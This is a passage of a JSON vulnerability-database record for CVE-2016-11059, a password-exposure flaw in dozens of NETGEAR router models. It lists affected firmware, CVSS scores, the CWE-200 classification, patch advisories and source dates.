"cpe:2.3:h:netgear:jnr3300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:jr6100_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:jr6100:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:jwnr2000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:jwnr2000:v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r2000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6200:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wgr614_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wgr614:v10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr3400:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr3700:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4500:v1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr1000:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr1000:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr2000:v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr2000:v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr2200_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr2200:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr2500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr2500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-11059" } ] }, "cve": "CVE-2016-11059", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2017-014989", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2016-11059", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2017-014989", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-11059", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2017-014989", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-202004-2304", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-11059", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-11059" }, { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "NVD", "id": "CVE-2016-11059" }, { "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. This affects AC1450 prior to 2017-01-06, C6300 prior to 2017-01-06, D500 prior to 2017-01-06, D1500 prior to 2017-01-06, D3600 prior to 2017-01-06, D6000 prior to 2017-01-06, D6100 prior to 2017-01-06, D6200 prior to 2017-01-06, D6200B prior to 2017-01-06, D6300B prior to 2017-01-06, D6300 prior to 2017-01-06, DGN1000v3 prior to 2017-01-06, DGN2200v1 prior to 2017-01-06, DGN2200v3 prior to 2017-01-06, DGN2200V4 prior to 2017-01-06, DGN2200Bv3 prior to 2017-01-06, DGN2200Bv4 prior to 2017-01-06, DGND3700v1 prior to 2017-01-06, DGND3700v2 prior to 2017-01-06, DGND3700Bv2 prior to 2017-01-06, JNR1010v1 prior to 2017-01-06, JNR1010v2 prior to 2017-01-06, JNR3300 prior to 2017-01-06, JR6100 prior to 2017-01-06, JR6150 prior to 2017-01-06, JWNR2000v5 prior to 2017-01-06, R2000 prior to 2017-01-06, R6050 prior to 2017-01-06, R6100 prior to 2017-01-06, R6200 prior to 2017-01-06, R6200v2 prior to 2017-01-06, R6220 prior to 2017-01-06, R6250 prior to 2017-01-06, R6300 prior to 2017-01-06, R6300v2 prior to 2017-01-06, R6700 prior to 2017-01-06, R7000 prior to 2017-01-06, R7900 prior to 2017-01-06, R7500 prior to 2017-01-06, R8000 prior to 2017-01-06, WGR614v10 prior to 2017-01-06, WNR1000v2 prior to 2017-01-06, WNR1000v3 prior to 2017-01-06, WNR1000v4 prior to 2017-01-06, WNR2000v3 prior to 2017-01-06, WNR2000v4 prior to 2017-01-06, WNR2000v5 prior to 2017-01-06, WNR2200 prior to 2017-01-06, WNR2500 prior to 2017-01-06, WNR3500Lv2 prior to 2017-01-06, WNDR3400v2 prior to 2017-01-06, WNDR3400v3 prior to 2017-01-06, WNDR3700v3 prior to 2017-01-06, WNDR3700v4 prior to 2017-01-06, WNDR3700v5 prior to 2017-01-06, WNDR4300 prior to 2017-01-06, WNDR4300v2 prior to 2017-01-06, WNDR4500v1 prior to 2017-01-06, WNDR4500v2 prior to 2017-01-06, and WNDR4500v3 prior to 2017-01-06", "sources": [ { "db": "NVD", "id": "CVE-2016-11059" }, { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "VULMON", "id": "CVE-2016-11059" } ], "trust": 1.71 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-11059", "trust": 2.5 }, { "db": "JVNDB", "id": "JVNDB-2017-014989", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-202004-2304", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-11059", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-11059" }, { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "NVD", "id": "CVE-2016-11059" }, { "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "id": "VAR-202004-1262", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4701049285185185 }, "last_update_date": "2023-12-18T13:47:33.127000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NETGEAR Product Vulnerability Advisory: Authentication Bypass and Information Disclosure on Home Routers", "trust": 0.8, "url": "https://kb.netgear.com/27253/netgear-product-vulnerability-advisory-authentication-bypass-and-information-disclosure-on-home-routers" }, { "title": "Multiple NETGEAR Product information disclosure vulnerability repair measures", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=117917" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "NVD", "id": "CVE-2016-11059" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://kb.netgear.com/27253/netgear-product-vulnerability-advisory-authentication-bypass-and-information-disclosure-on-home-routers" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-11059" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-11059" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-11059" }, { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "NVD", "id": "CVE-2016-11059" }, { "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-11059" }, { "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "db": "NVD", "id": "CVE-2016-11059" }, { "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-04-28T00:00:00", "db": "VULMON", "id": "CVE-2016-11059" }, { "date": "2020-06-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "date": "2020-04-28T17:15:12.460000", "db": "NVD", "id": "CVE-2016-11059" }, { "date": "2020-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-05-06T00:00:00", "db": "VULMON", "id": "CVE-2016-11059" }, { "date": "2020-06-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-014989" }, { "date": "2020-05-06T19:14:54.050000", "db": 